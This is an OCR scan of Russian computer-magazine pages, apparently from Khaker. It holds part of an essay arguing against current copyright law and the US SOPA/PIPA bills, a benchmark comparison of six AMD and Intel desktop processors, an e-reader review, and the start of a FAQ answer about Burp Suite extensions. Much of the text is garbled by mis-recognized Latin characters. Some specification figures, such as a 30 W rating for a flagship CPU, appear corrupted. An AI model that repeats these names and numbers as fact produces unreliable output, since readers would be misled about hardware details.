социальных обязательств набрали, дармоедов 
расплодили, аденьги внезапно кончились. Вот 
и приходится СШАбряцатьоружием по всему 
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СЦЕНА 




Схема 2. Модификация предыдущей модели для цел ей радиовещания 

Ввиду большого количества связей типа «исполнитель — посредник» (малиновые), разрешено для них не заклю- 
чать договоры (не получать предварител ьного согласия), но вел ено выплачивать вознаграждение. Связи «посред- 
ник— потребитель»также, как в предыдущем случае, оставлены бездоговорными (синие) 



миру, ставить своих людей у власти и вмешивать- 
ся во внутренние дела других стран. Иначе мир 
перестанет покупать а мери канские бумажки. 

Не только зеленые. Главным образом, бумажки 
белые: патенты, лицензии итехнологии. 



КРУТОЙ ПОВОРОТ 



Когда положение с торговлей ИС более-менее 
устаканилось, в нее ворвался интернет и всем 
спутал карты. 

Копирование информации стало не «почти», 
а совсем бесплатным. И главное — быстрым и гло- 
бальным. Информация окончательно отвязалась 
относителя,а конечные потребители ИСприобре- 
ли некоторуюанонимностьи перестали нуждать- 
ся в посредниках в виде издательств, дистри- 
бьюторов, кинотеатров, телекомпаний и прочего. 
Нарушать авторские права стало необычайно 
легко, а л овить нарушителей — сложно. 

При этом все законы об ИС писались в сере- 
динеХХвека и были рассчитаны натогдашние 
технологии: бумагу, кинопленку, ноты, эфирное 
телевещание и концерты в залах. В них, конечно 
же, внесли поправки про компьютерные про- 
граммы и «доведение до всеобщего сведения» 
через веб-сайт. Но никакие заплатки не могут ис- 
править базис, если он перестал соответствовать 
реальности. А базис-то у копира йтн о го законода- 
тельства — бумажный. 



ПРАВО РАЗРЕШАТЬ 



Докомпьютерные конвенции по ИС (Бернская 
конвенция 1886 года, Женевская конвенция 
1952 года, Римская конвенция 1961 года итак 
далее) и принятые на их основе национальные 
законы изначально «не знали» про интернет. 
Соответственно, они на него не рассчитывали. 
Сама модель авторских прав не укладывается 
в глобальную сеть. 

Концепция авторских прав предусматривает 
правоавтора (правообладателя) разрешать 



любое использование произведения. Отсутствие 
разрешения эквивалентно запрету. Под- 
разумевается, что издатель или иной посредник 
заключает с автором договор, покупает у него 
соответствующее право и потомуже издаетпро- 
изведение для массового потребителя. Авторов 
тысячи, издателей сотни, потребителей — мил- 
лиарды. Авторы с издателями вполне могут за- 
ключить письменные договоры на каждое произ- 
ведение; именно та кого договора требует за кон. 
Между издателями и потребителями каких-то 
формальных договоров не предусмотрено, рас- 
пространение же массовое. Однако их отношения 
построены на существовании «экземпляра», то 



есть некоего носителя струдноотчуждаемым 
контентом — книги, диска, нахудой конец, кассе- 
ты. Именно распространение однажды выпущен- 
ного «экземпляра» допускается без отдельного 
письменного договора на каждую перепродажу 
и на каждый акт его использования (см. схему 1). 

Интернет ликвидировал понятие «эк- 
земпляр». И ударными темпами ликвидирует 
посредников. Ныне десяткитысяч авторовхотят 
распространить произведение миллиардам 
пользователей. А писанное в прежней парадигме 
законодательствотребуетдля этого предвари- 
тельно заключить договор в письменной форме 
между каждым автором и каждым пользователем. 
Технологии давно позволяют распространять 
и оплачивать произведения без неизменного но- 
сителя и без посредника. Законы же по-прежнему 
требуюттого и другого. И настаиваютна предва- 
рительном заключении лицензионного договора 
каждого с каждым (см. схему 2). 

Столь вопиющее несоответствие новых про- 
изводительных сил и старых производственных 
отношений, естественно, приводит к револю- 
ционной ситуации. И пользователи, и авторы 
стремятся взаимодействовать напрямую. 
Посредники же настаиваютна старой модели 
с«правом разрешать»и лоббируютвсе новые 
законы, которыезатрудняли бы прямую оплатуза 
использование произведения (см. схемы 3 и 4). 

Та ким же образом ставятся палки в колеса 
всем иным моделям монетизации контента. Ихза 
последние годы открыто несколько. 

Авторы могут не только продавать право 
использования произведения (лицензию). Про- 
изведение можно распространять бесплатно, 
а деньги получать на сопутствующей рекламе, 
на сервисном обслуживании, на продаже про- 
двинутых версийилина пакетной продаже. Не 
говоря уже о чисто коммунистическом способе 
производства (так называемые свободные 




Схема З.Модельбезфиксированныхэкземпляров, ограниченно применяемая сейчас 

Связи автора с посредником— традиционные. Связи посредника с пользователем должны оформляться договором 
(красные), поскольку отсутствуетфиксированный носитель. Из-за их громадного числа эти связи не поддаются 
ручному учету и бумажному оформлению. Используется компьютерный учет. А вместо письменного договора при- 
меняется юридический костыль в виде акцепта договора присоединения, который приравнен к письменной форме 
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История копирастии 




Схема 4. Перспективные отношения авторов и потребителей 

Устроены без посредников (с исключительно техническим посредником). Для этого нужноснятьтребование обяза- 
тельного предварительного договора с правообладателем (все связи синие) 



лицензии]. Все эти способы также плохо укла- 
дываются в старую модель копирайта, которая 
жестко устанавливает единственный способ — 
лицензионные платежи. Шаг вправо- влево — 
и ты уже вне правового поля, то есть никак не 
защищен. Даже широко распространенные 
лицензии типа 6РЬ и СС представляют собой 
своеобразный ха к старого законодательства, 
когда некоторые его фичи были использова- 
ны нештатным способом для достижения не 
предусмотренного коп и раста ми эффекта. Ход 
остроумный, но он открывает дорогу л ишь не- 
коммерческому использованию произведений. 
А монетизация возможна лишь по старинке. 



ЛОББИСТЫ 



У традиционных посредников — издателей еще 
остались со старых времен толстые денежные 
потоки. Несмотря наточтоони истончаются 
с каждым годом, их в пол не хватает на лоббист- 
ские усилия, чтобы поддерживать ста рое законо- 
дательство и проводить мракобесные поправки. 
У новой модели И С лоббистов нет. Пока еще никто 
не начал зарабатывать новым способом больших 
денег. Вотразвечто Гугл немножко... Тысячи 
авторов и миллиарды потребителей «нового» 
контента никак не объединены, чтобы заявить 
о своих интересах и продавить новые законы. 

Пиратские партии пока стоят на довольно 
экстремистских позициях, требуют, чтоб всё«до 
основанья, азатем». Такая позиция неимеет 
шансов. Нужна модель, которая бы отменяла 
«право разрешать и запрещать», но сохраняла 
бы право на вознаграждение. Это позволит 
реформировать ИС без крови и войн. 

Посмотрим, какие поправки были внесены 
в авторское право в связи с массовым радиове- 
щанием (схема 2). Поскольку число связей «ав- 
торы — радиостанции» сильно превышало число 
связей «писатели — издательства», заключать 
предварительные договоры на проигрывание 
каждой фонограммы уже не представлялось 



возможным. И «правом разрешать» пришлось 
пожертвовать, сохранив, однако, право на воз- 
награждение. Правда, при отсутствии пред- 
варительного договора правообладатель уже 
не мог торговаться с радиостанцией. Пришлось 
пойти на оплату по фиксированным ставкам, 
которые устанавливает кто-то третий, например 
правительство. Но другого выхода не было: или 
фиксированные ставки, или радио без музыки 
(а музыканты — без соответствующей части до- 
ходов). Модель оказалась жизнеспособной. 

Выходит, что поступиться принципами (то 
есть«правом разрешать») все-таки можно, не- 
смотря на то что учитывать переданные в эфир 
произведения очень нелегко. Радиостанций 
в мире тысячи, фонограмм — сотни тысяч, за 
каждой стоят композитор, автор слов и ис- 
полнитель. Из разных стран. Тем не менее еще 
в 1970-х научились все учитывать и более-менее 
справедливо делить радиоденьги. 

В интернете дело осложняется тем, что за- 
грузки потребителями контента надо считать 



индивидуально. Зато этотучетуже можно не 
вести вручную, как на радиостанциях (до сих 
пор, кстати]. Можно поручить биллинг компью- 
терам. Нынешниетехнологии вполне позволяют 
идентифицировать и подсчитать бОльшую часть 
контента, передаваемого по сетям, в том числе 
файлообменным. Финансовые технологии по- 
звол я ют удержать плату за него (хоть с пользо- 
вателей, хоть с провайдеров, хоть с тех и других] 
и распределить ее между правообладателями 
пропорционально числу за качек и ценности кон- 
тента. Только закон этого не позволяет. Причем 
закон об И С глобализован. Менять его пришлось 
бы во всех странах одновременно. 



ГЛОБАЛИЗАЦИЯ 



Законопроекты РІ РА и 30 РА на дел я ют Минюст 
США правом требовать от провайдеров за пре- 
титьдоступ ксайту-нарушителю, отплатежных 
систем — прекратить платежи и от поискови- 
ков — исключить сайты из поисковой выдачи. 

Даже если сам сайт вне досягаемости властей 
США, ему перекроют кислород — без доменного 
имени и индексации в Гугле долго не протянешь. 
Дажеесли нельзя будет дотянуться до сайтовла- 
дельца, накажут всех, с кем он связан по бизнесу. 
Без рекламодателей и платежных систем — 
какойужтутбизнес! 

Из множества вещей — Д НС-запросы, тра- 
фик, платежи, лицензии на софт — что-нибудь 
обязательно проходитчерез США. Пользуясь 
этим обстоятельством, Штаты могутприкрыть 
почти любой проект в интернете. Особенно если 
отбросятпринцип вины и примутвзамен принцип 
коллективной ответственности. Дотянемся до 
кого можем, а уже он пускай дотягивается до 
нарушителя. 

Собственно, ужесточать анти пиратское за- 
конодательство внутри США не требуется. Там 
да в но уже уровень на рушен ий сведен к миниму- 
му, все североамериканские пользователи ходят 
по струнке и чуть что вытаскивают кредитную 
карточку. Оба помянутыхзаконопроекта направ- 
лены нато, чтобы фактически распространить 
юрисдикцию США на все другие страны, фор- 
мально оставаясь в собственной. Глобальность 
интернета позволяетэто сделать. ПС 



ОТНОШЕНИЕ 


СОБСТВЕННОСТЬ 


ИНТЕЛЛЕКТУАЛЬНАЯ 

СОБСТВЕННОСТЬ 


когда возникло 


ранее 4000 г. до н.э. 


примерно в XVII веке н.э. 


где провозглашается 


ст. 35 Конституции РФ 


ч. 1 ст. 44 Конституции РФ 


чем является 


естественным правом 
человека 


искусственной монополией 
(привилегией) 


общественная опасность 
нарушения 


прямой ущерб 


недополученная прибыль 


термины 


собственник, владелец; 
хищение, мошенничество, 
кража, грабеж, разбой 


правообладатель; 
нарушение авторских прав, 
плагиат (пиратство) 


отношение к морали 


присутствует во всех этических 
системах и религиях 


только начинает вводиться 
в мораль (с конца XX века) 



Разные виды имущественных прав. Г раницы между ними часто размываются и искажаются. Порой умышленно 
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ГЕМШМ 



Сергей Плотников 




КАМЕННЫЙ 




ТЕСТИРОВАНИЕ ЦЕНТРАЛЬНЫХ 
ПРОЦЕССОРОВ 



роцессоры, представленные в сегодняшнем тесте, уже 
хорошо знакомы постоянному читателю журнала «Хакер». 
I Их потенциал известен. Тем не менее мы посчитали полез 
ным собрать наиболее популярные «камни» АМй и Іпіеі и еще раз 
сравнить их. Как говорится, просим любить и жаловать! 



АМйРІіепот 11X4 970 ВЕ 
АМй РНепот II Х6 1090Т ВЕ 
АМй РХ-8150 
ІпІеІСоге І5-2500К 
Іпіеі Соге І7-2600К 
Іпіеі Соге І7-3960Х 



МЕТОДИКА ТЕСТИРОВАНИЯ 

Сперва ознакомимся с методикой тестирования. Для сравнения 
процессоров было собрано четыре максимально схожих тесто- 
вых стенда. Все тесты для начала проводились при номиналь- 
ных скоростях процессоров. Затем частоту каждого «камня» за 
счет повышения множителя увеличивали до 4000 МГц, для того 
чтобы сравнить производительность архитектур. Частота опера- 
тивной памяти — 1600 МГц. Заметим, что в первом случае были 
задействованы такие технологии, как Іпіеі ТигЬо Воові и АМй 
ТигЬо Соге. 

В тесте принимали участие следующие бенчмарки: ѵѵРгіте 
1.55 (паттерн 1024т), СІМЕВЕІЧСН Р11.5, ѴѴіпРАР, ЗйМагк Ѵапіаде 
и ЗйМагк 11. Также мы запускали ряд игр: Резісіепі ЕѵіІ 5 — при 
максимальном качестве графики, но разрешении 1280x1024 точек 
и ВаиіеПеИ 3 с ТЬе ЕИег ЗсгоІІз V: Зкугіт — при максимальном 
качестве графики и разрешении дисплея 1920x1080 точек. 



Процессорный кулер: 

ТНегтаІІаке Ргіо ОСК 
Материнские платы: А51І5 
М5А99Х ЕѴО, ВІ05ТАР Т268А+, 
6І6АВѴТЕ 6А-А75-03Н, Іпіеі 
0X7951 

Оперативная память: Согзаіг 
СМТ46ХЗМ2А1 600С6, 2x2 Гб 
Видеокарта: ЬеасЙек ѴѴіпРазІ: 
6ТХ 580 36,3 Гб 
Накопитель: Согзаіг Рогсе 
120, 120 Гб 

Блок питания: Епегтах 

Ріаіітах, 750 Вт 

ОС: ѴѴіпсІоѵѵз 7 Максимальная 





Каменный холивар 



АМОРНЕГІОМ 11X4 970 ВЕ 



роцессоры архитектуры КІО — наши старые знакомые. 
После провального первого поколения АМР РЬепот II 
и АМй АіЫоп II оказались настоящим откровением! Нет, 
побороться на равных с Іпіеі ІЧеЬаІет и, тем более, Іпіеі Ба псіу 
Вгісіде им не удается. Но у того же АМй РЬепот II Х4 970 ВЕ есть 
масса козырей в рукаве. 

Во-первых, «камни» АМй РЬепот II совместимы с АМ2+ 
материнскими платами. А все за счет встроенного контроллера 
памяти ООР2. Даже сейчас, когда АМР сменила два поколения 
чипсетов, обладатель «старушки» с АМ2+ сможет побаловать себя 
апгрейдом, приличным апгрейдом. Необходимо лишь обновить 
ВІ05. Но, имхо, АМй РЬепот II Х4 970 ВЕ найдет лучшее примене- 
ние в системе с йОРЗ. Благо множители позволяют использовать 
наборы с частотой до 1600 МГц. Установить более производитель- 
ные плашки поможет разгон, ибо частоту тактового генератора 
легко увеличить. 

Наконец, АМй РЬепот II Х4 970 ВЕ снабжен разблокирован- 
ным множителем. Вкупе с отличным разгонным потенциалом 
самостоятельно увеличить производительность СРІІ не составит 
проблем. 

За демократичную стоимость, хорошую производительность 
и высокий разгонный потенциал АМй РЬепот II Х4 970 ВЕ достоин 
награды «Бюджетный выбор». 





АМО РНЕЫОМ II Х6 1090Т ВЕ 

П первого взгляда может показаться, что основное отли- 
чие АМй РЬепот II Х6 от АМй РЬепот II Х4 заключается 
в большем числе ядер. Но это не так. Например, более 
«головастый» процессор поддерживает технологию АМО ТигЬо 
Соге — аналог Іпіеі ТигЬо ВоозЕ Так, АМй РЬепот II Х6 1090Т ВЕ 
может автоматически менять частоту от 3,2 ГГцдоЗ,6 ГГц. Впрочем, 
имея в своем арсенале разблокированный множитель, АМО ТигЬо 
Соге вряд ли заинтересует энтузиастов. 

В остальном перед нами все тот же К10 -процессор. Как и АМО 
РЬепот II Х4 970 ВЕ, шестиядерник совместим с материнскими 
платами АМ2+. Встроенный контроллер памяти позволяет ис- 
пользовать как ООР2-, так и ООРЗ-память. Максимальная частота 
— 1600 МГц. Для того чтобы использовать более скоростной кит, 
придется повышать частоту шины. Например, чтобы запустить 
модуль с номиналом 1866 МГц, придется поднять Виз БреесІ до 
1866/8 = 233,25 МГц. Любая более-менее производительная плата 
справится стаким оверклоком. 

Чуть забегая вперед, скажем, что АМй РЬепот II Х6 не сильно 
отстают от более современных АМй РХ архитектуры ВиІІсІогег. А в не- 
которых приложениях, наоборот, превосходят новинку. В тех же 
играх, например. Так что обладателям шестиядерных «камней» К10 
нет смысла пересаживаться на новенькие «бульдозеры». 
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РЕККІІМ 




АМР РХ-8150 



А 



рхитектура АМй ВиІІсІогег подразумеваетувеличение коли- 
чества ядер при их относительном упрощении, но с замет- 
ным возрастанием частотных характеристик. Вот и топовый 
в линейке «бульдозер» функционирует со скоростью 3,6 ГГц. При 
этом технология АМй ТигЬо Соге способна автоматически поднимать 
частоту процессора до 3,9 ГГц. Но 32-нанометровый техпроцесс по- 
зволил удержать тепловыделение «камня» в рамках 125 Вт. 

Главная фишка АМР РХ-8150 — великолепный разгонный 
потенциал! Во-первых, все «бульдозеры» серии РХ снабжены раз- 
блокированным множителем. Также контроллер памяти обзавелся 
делителем памяти 1:6, позволяющим использовать киты частотой 
2400 МГц. С учетом возможности разгона за счет тактового генера- 
тора вы можете без проблем обзавестись «мозгами» частотой 2400 
МГц и выше. Кроме того, АМй РХ-8150 принадлежит абсолютный 
рекорд по разгону процессоров! Так, тайваньский оверклокер 
АпбгеѴапд сумел пройти валидацию на частоте 8585 МГц. 

Действительно, разгон АМй РХ-8150 жизненно необходим. А все 
потому, что в номинальном режиме «бульдозер» уступает даже 
шестиядерному АМй РЬепот II Х6. Все-таки в домашнем использо- 
вании от восьми ядер пока немного толку. 



ІІІТЕІ. СОКЕ І5-2500К 




ели сравнивать Іпіеі Соге І5-2500К с Іпіеі Соге І5-2400, то 
можно выявить четыре основных отличия. Первое — раз- 
блокированный множитель процессора (о чем говорит 
литера «К» в названии). Второе — увеличенная до 3,3 ГГц частота 
«камня». Третье — соответственно, большая скорость работы 
в режиме ТигЬо ВоозГ Если быть более точным, то при помощи этой 
технологии СРІІ саморазгоняется до 3,7 ГГц. Четвертое — наличие 
встроенного видео Іпіеі РЮ СгарЫсз 3000 вместо Іпіеі РЮ СгарЫсз 
2000 у Іпіеі Соге І5-2400. 

Авторазгон нам не нужен. Техноманьяк наверняка захочет все 
сделать сам, благо Іпіеі Бапсіу Вгісіде демонстрируют великолепные 
оверклокерские способности «на воздухе». Так, наш экземпляр 
процессора способен стабильно работать на частоте 5 ГГц. Для этого 
нам потребовалось поднять множитель чипа до отметки х49, а часто- 
ту шины — до 102 МГц. Но есть экземпляры, способные стабильно 
работать «на воздухе» на частоте 5,5 — 5,8 ГГц. 

В общем, перед вами идеальный процессор для домашнего ис- 
пользования. Большие множители памяти позволят задействовать 
в системе память частотой 2133 МГц. Встроенный контроллер РСІ 
Ехргезз даст возможность использовать в системе массивы видео- 
карт АМй СгоззРігеХ и ІЧѴЮІА БЫ. А высокий разгонный потенциал 
«прокачает» связку из топовых адаптеров. 




ТЕХНИЧЕСКИЕ 

ХАРАКТЕРИСТИКИ 



Сокет: 

Количество ядер (потоков): 
Тактовая частота: 
Множитель процессора: 
Память: 

Множители памяти: 

Кеш И: 

Кеш 12: 

Кеш 1.3: 

ЮР: 




АМЭ РНепот II Х4 
970 ВЕ 



АМ2+/АМЗ/АМЗ+ 

4(4) 

3,5 ГГц 

17.5, разблокирован 

Ц0Р2/00РЗ, двухканальная 

х4, х5.33, хб.бб, х8 

512 Кб 

2048 Кб 

6 Мб 

125 Вт 





АМЭ РНепот II Х6 
1090ТВЕ 


Гт: г 


АМй РХ-8150 


к 11 


і. Л 









АМ2+/АМЗ/АМЗ+ 

6 ( 6 ) 

3,2 ГГц 

х16, разблокирован 

00Р2/00РЗ, двухканальная 

х4, х5.33, хб.бб, х8 

768 Кб 

3072 Кб 

6 Мб 

125 Вт 



АМЗ+ 

8 ( 8 ) 

3,6 ГГц 

х18, разблокирован 

йОРЗ, двухканальная 

х4, х5.33, хб.бб, х8, х9.33, х12 

384 Кб 

8192 Кб 

8 Мб 

125 Вт 
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Каменный холивар 



ІІІТЕІ. СОКЕ І7-2600К 

сновное отличие процессоров Іпіеі Соге І5 от Іпіеі Соге І7 
архитектуры I піеі Запсіу Вгісіде заключается в поддержке 
более производительным «камнем» технологии Нурег- 
ТЬгеасІіпд. Следовательно, тотже Іпіеі Соге І7-2600К обладает 
четырьмя физическими ядрами и восемью виртуальными пото- 
ками. В остальном перед нами стандартный Іпіеі Запсіу Вгісіде, но 
с увеличенным до 8 Мб кешем третьего уровня и со встроенной 
графикой Іпіеі Нй СгарЫсз 3000. 

Номинальная частота «камня» — 3,4 ГГц. Но за счет Іпіеі ТигЬо 
Воозі она легко поднимается до 3,8 ГГц. При желании эту техно- 
логию можно отключить и разогнать Іпіеі Соге І7-2600К самостоя- 
тельно. Гайд на тему «Как разогнать Іпіеі Запсіу Вгісіде» можете 
изучить, перейдя по ссылке хагсІ.ги/ро5і/21085 . 

Что касается результатов, то прирост производительности от 
Нурег-ТЬгеасІіпд заметен лишь в многопоточных приложениях 
(спасибо, Капитан Очевидность!). Да и то не на все 200 процентов. 
А вот, например, в играх прироста производительности практиче- 
ски нет. Большинство игр не используют даже четыре ядра. И вряд 
ли в ближайшем будущем будут использовать. Поэтому покупка 
Іпіеі Соге І7-2600К целесообразна для тех, кто нуждается в мощно- 
сти всех восьми потоков центрального процессора. 






◄ 



ІЫТЕІ. СОКЕ І7-3960Х 




ам наверняка известно, что Іпіеі Соге І7-3960Х на сей момент 
является самым производительным «камнем» в настольном 
сегменте. Сегодняшнее тестирование только констатирует 
этот факт. 

Царь-процессор работает с частотой 3,3 ГГц, но технология Іпіеі 
ТигЬо Воозі 2.0 позволяет автоматически поднять данный показатель 
до отметки 3,9 ГГц. В любом случае Іпіеі Соге І7-3960Х оснащен раз- 
блокированным множителем. Как показывает практика, 4,8 ГГц «на 
воздухе» для этого СРІІ — не проблема. 

Но это еще не все. Наконец, только с топовым процессором 
и топовой платформой Іпіеі Х79 Ехргезз частота тактового генератора 
больше не привязана к остальным шинам. А это значит, что для раз- 
гона Іпіеі Запсіу Вгісіде-Е подходит как нельзя лучше. 

Встроенный контроллер памяти процессора Іпіеі Соге І7-3960Х 
позволяет использовать четырехканальные наборы памяти частотой 
2666 МГц. В свою очередь, встроенный контроллер РСІ Ехргезз гене- 
рирует до 40 линий РСІ Ехргезз 3.0. В совокупности с чипсетом Іпіеі 
Х79 Ехргезз мы получаем самую топовую платформу. Расстраивает 
лишь одно — конечная стоимость подобного десктопа: 31 500 рублей 
за процессор и минимум 7000 рублей за материнскую плату на базе 
Іпіеі Х79 Ехргезз. 



ЕЙ 1 

1 Іпіеі Соге 


— 1 [ 


М 1 


Іпіеі Соге І7- 


I; 1 І5-2500К 


2600К 1 


— 


3960Х 



І_6А1155 

4(4) 

3,3 ГГц 

хЗЗ, разблокирован 

ОйРЗ, двухканальная 

хЮ.66, хІЗ.ЗЗ, х16, ХІ8.86, х21 .33 

256 Кб 

1024 Кб 

6 Мб 

95 Вт 



І_ВА1155 

4(8) 

3,4 ГГц 

х34, разблокирован 

ОйРЗ, двухканальная 

хЮ.66, хІЗ.ЗЗ, х16, ХІ8.86, х21.33 

256 Кб 

1024 Кб 

8 Мб 

95 Вт 



ЮА2011 

6 ( 12 ) 

3,3 ГГц 

хЗЗ, разблокирован 

ОйРЗ, четырехканальная 

хЮ.66, хІЗ.ЗЗ, х16, ХІ8.86, х21.33, х24, х26.66 

384 Кб 

1536 Кб 

5 Мб 

30 Вт 



ИТОГИ ТЕСТИРОВАНИЯ 

Сегодняшний тест отчетливо показал, что у Іпіеі, 
к сожалению, нет достойного конкурента. Флаг- 
манский процессор АМй РХ-8150 может тягаться 
разве только с мейнстримовым Іпіеі Соге І5-2500К. 
Приз «Лучшая покупка» достается Іпіеі Соге І5- 
2500К. Перед нами, пожалуй, идеальный «камень» 
для домашнего использования. Богатый набор 
множителей вкупе с отличным разгонным потен- 
циалом позволят без особых проблем увеличить 
и без того высокий уровень производительности. 
Наконец, «Выбор редакции» достается процессо- 
ру Іпіеі Соге І7-3960Х. О таком «камне» не стыдно 
и мечтать, ц-ц 
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РЕЗУЛЬТАТЫ ТЕСТОВ 



ЖРКІМЕ 1.55 1024М, С 



Іпіеі Соге І7-3960Х 
ІпѣеІ Соге І7-2600К 
Іпіеі Соге І5-2500К 
АМО РХ-8150 
АМО РЬепот II Х6 1090Т ВЕ 
АМй РЬепот 11X4 970 ВЕ 




Многопоточный тест ѵѵРгіте 1.55 наглядно демонстрирует, что восьмиядерный АМй 
РХ-8150 уступает даже шестиядерному АМй РИепот II Х6 1090Т ВЕ 



СШЕВЕМСН, БАЛЛЫ 



Іпіеі Соге І7-3960Х 
Іпіеі Соге І7-2600К 
Іпіеі Соге І5-2500К 
АМО РХ-8150 

АМО РИепот II Х6 1090Т ВЕ 
АМй РНепот II Х4 970 ВЕ 




0 2 4 6 8 10 12 



Іпіеі Соге І7-3960Х со своими 12 потоками находится вне конкуренции 



ѴѴІЫКАР, КБ/С 



Іпіеі Соге І7-3960Х 
Іпіеі Соге І7-2600К 
Іпіеі Соге І5-2500К 
АМО РХ-8150 

АМО РЬепот II Х6 1090Т ВЕ 
АМО РЬепот II Х4 970 ВЕ 




И опять нам приходится констатировать преимущество процессоров Іпіеі 



ЗР МАРК 11. БАЛЛЫ 



Іпіеі Соге І7-3960Х 
Іпіеі Соге І7-2600К 
Іпіеі Соге І5-2500К 
АМО РХ-8150 

АМО РНепот II Х6 1090Т ВЕ 
АМО РИепот 11X4 970 ВЕ 




0 1000 2000 3000 4000 5000 6000 7000 



Физика в бенчмарке ЗйМагк 11 лучше обрабатывается при помощи процессоров Іпіеі 



ЗБМАРК ѴАМТА6Е, БАЛЛЫ 



Іпіеі Соге І7-3960Х 



Іпіеі Соге І7-2600К 
Іпіеі Соге І5-2500К 



АМО РХ-8150 

АМО РЬепот II Х6 1090Т ВЕ 
АМй РЬепот II Х4 970 ВЕ 





ИГРЫ, РР5 

Іпіеі Соге І7-3960Х 
Іпіеі Соге І7-2600К 
Іпіеі Соге І5-2500К 
АМО РХ-8150 

АМО РНепот II Х6 1090Т ВЕ 
АМй РИепот II Х4 970 ВЕ 

І ТЬе Еісіег ЗсгоІІзѴ: 5КУРІМ 
ВаШеПеИ 3 
Резісіепі ЕѵіІ 5 




0 10 20 30 40 50 60 70 80 90 100 



Похожая ситуация и в ЗйМагк Ѵапіаде 



Игровые приложения демонстрируют небольшое, но превосходство процессоров Іпіеі 



ГЕМШМ 



Николай Арсеньев 




ѴѴЕХІ.ЕК 

РЬЕХОЫЕ 



ПРОТИВОУДАРНЫЕ 

ЧЕРНИЛА 



ечасто наши компании радуют пользователей 
чем-то действительно оригинальным и даже 
уникальным. А вот ѴѴЕХІ_ЕР удалось это сделать, 
представив первую в мире электронную книгу на основе 
гибкого полимерного экрана Е-іпк, обеспечивающего 
противоударный эффект. 

В элегантной коробке аккуратно разложены сама 
«книга», чехол, ІІ5В-кабель, зарядное устройство и кра- 
тенькая инструкция на пару с мультикартой для фирмен- 
ного электронного магазина книг. 

Первое знакомство с ѴѴЕХІ_ЕР.РІех ОЫЕ поражает: книга 
очень компактная, заключена в приятный на ощупь пла- 
стиковый корпус с ребристым узором на тыльной стороне. 
Смотришь и думаешь: «Куда вся начинка поместилась-то?!» 
Толщина области экрана всего 4 мм; кнопки выведены на 
нижнюю лицевую часть, за ней и скрывается аппаратная 
начинка. Здесьтолщина устройства достигает 10 мм. Такой 
выступ позволяет четко зафиксировать книгу в руке. Без 
него, пожалуй, не было бы так удобно. 

Надежность конструкции не вызывает сомнений, 
корпус отлично собран, использование гибкого дис- 
плея с электронными чернилами — это не рекламный 
трюк! «Книга» выгнута в небольшую дугу. Однако гнуть 
ѴѴЕХІ_ЕР.РІех ОЫЕ специально не стоит. Преимущество 
новой технологии не в гибкости кактаковой, а в обеспе- 
чении устойчивости ридера к механическим воздействи- 
ям, к которым очень чувствительны все существующие 
сегодня на рынке устройства. По сути, перед нами первая 
в мире противоударная электронная книга. Кнопка 
включения, по совместительству отвечающая за вызов 
меню, находится сбоку, на лицевой части расположены 
основные клавиши навигации, выбора и возврата. Они 
несколько туговаты, но привыкаешь быстро. ѴѴЕХІ.ЕР. 

РІех ОЫЕ с головы до ногустройство для чтения: здесь нет 
никаких аудио- и РЮМІ-разъемов, динамиков и прочей 
«нечисти» вроде разъема под карты памяти. О последнем 
переживать не стоит. «Книга» предоставляет 8 Гб дис- 
кового пространства, этого достаточно для организации 
впечатляющей электронной библиотеки. 

Экран производства І_6 обладает разрешением 
1024x768 пикселей, контрастность достойная. Диагональ 
6 дюймов, но, как вы уже догадались, это не сделало 



книгу слишком большой или тяжелой — вес устройства 
составляет смешные 110 граммов. Абсолютный мировой 
рекорд! В корпус удалось втиснуть аккумулятор на 600 мАч. 
Разработчик заявляет о нескольких неделях при чтении по 
полчаса ежедневно, из этого можно сделать вывод, что на 
неделю-полторы активного чтения его должно хватить. 

Время на включение — чуть больше 10 с, скорость 
навигации по меню умеренная. Главная страница встреча- 
ет нас логичной структурой: окошко с наименованием 
последней открытой книги, по соседству список недавно 
открытых произведений, а внизу последние поступления. 
Есть файловый менеджер, в настройки входит возмож- 
ность выбора шрифта меню, таймера выключения, даты 
и времени, а также опция «Очистка экрана». Последняя 
весьма полезна. 

Список поддерживаемых форматов соответствует тре- 
бованиям современного пользователя, «книга» распозна- 
ет и архивы (2ІР, РАР), хотя на официальном сайте о них ни 
слова. Работа с большинством форматов происходит до- 
статочно быстро, однако открытие емких РОР-документов 
отнимаетуже не так мало времени, что вполне объяснимо. 

Приятно порадовало наличие виртуальной клавиату- 
ры для поиска, возможность делать закладки, переходить 
на нужную страницу и воспользоваться инверсией при 
чтении, не говоря уж про гибкую настройку полей. 



выводы 



ѴѴЕХІ_ЕР.РІех ОЫЕ, безусловно, вызывает интерес и сим- 
патию. Малый вес, приятный дизайн и противоударные 
свойства экрана делают свое дело! Не стоит забывать 
и про традиционные книги серии «Вселенная Метро 
2033», удобный чехол и мультикарту, которая при попол- 
нении счета в фирменном магазине книг добавит до 50% 
от внесенной суммы. 



ПЛЮСЫ И МИНУСЫ 



+ Новаторский дизайн, компактность, малый вес 
+ Противоударные свойства 
+ Гибкий дисплей с высоким разрешением 
+ Достойный список поддерживаемых форматов 
+ Удобный чехол 



кШ 


т 




ш 



Процессор: РосксЫр 
РК2808А, 560 МГц (АРМ9) 
Дисплей: 6 дюймов, 

1024x768, Е-іпк (Еіесігопіс 
Рарег Оізріау) 

Встроенная память: 8 Гб 
Форматы текста: СИМ, О.Ш, 
РОС, ЕРиВ,РВ2,НТМ, НТМЦ 
РОЕ, РРТ, ТХТ 
Интерфейс: 115В 2.0 
Аккумулятор: 600 мАч 
(Ы-Роіутег) 

Габариты: 151x134x4 (10) мм 
Вес: 110 г 

Дополнительно: три романа 
серии «Вселенная Метро 
2033», мультикарта 
Комплект поставки: 115В- 
кабель, зарядное устройство, 
обложка, краткая инструкция 
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ІЖІТБ/РАСНІМТЕО 



Глеб Чербов и коллективный разум 



РАО ІІпіІесІ 

ЕСТЬ ВОПРОСЫ — ПРИСЫЛАЙ 
НА РАО(аЯЕАІ..ХАКЕР.ІШ 



□ Для анализа взаимодействия 
с веб-приложением использую 
всем известную утилиту Вигр Биііе, но 
стандартного функционала хватает не 
всегда. Можно ли его расширить 
самому? 

□ Вигр Биііе действительно очень 

мощный и удобный инструмент, но 
совершенству нет предела. Поэтому в нем 
имеется механизм пользовательских 
расширений, позволяющий всем желаю- 
щим при необходимости написать аддон 
под собственную задачу. Разработчики 
предлагают делать это на Эаѵа, родной для 
Вигр'а, что не всегда удобно. К счастью, 
есть расширения-интерфейсы, которые 
придутся по нраву любителям других 
языков: ВигрРуіЬоп ( ЬіІ.Іѵ/Ьигр рѵіЬоп ) и 
ВиЬу ( ЬіІ.Іѵ/Ьигр ЬиЬѵ ). Первый представ- 
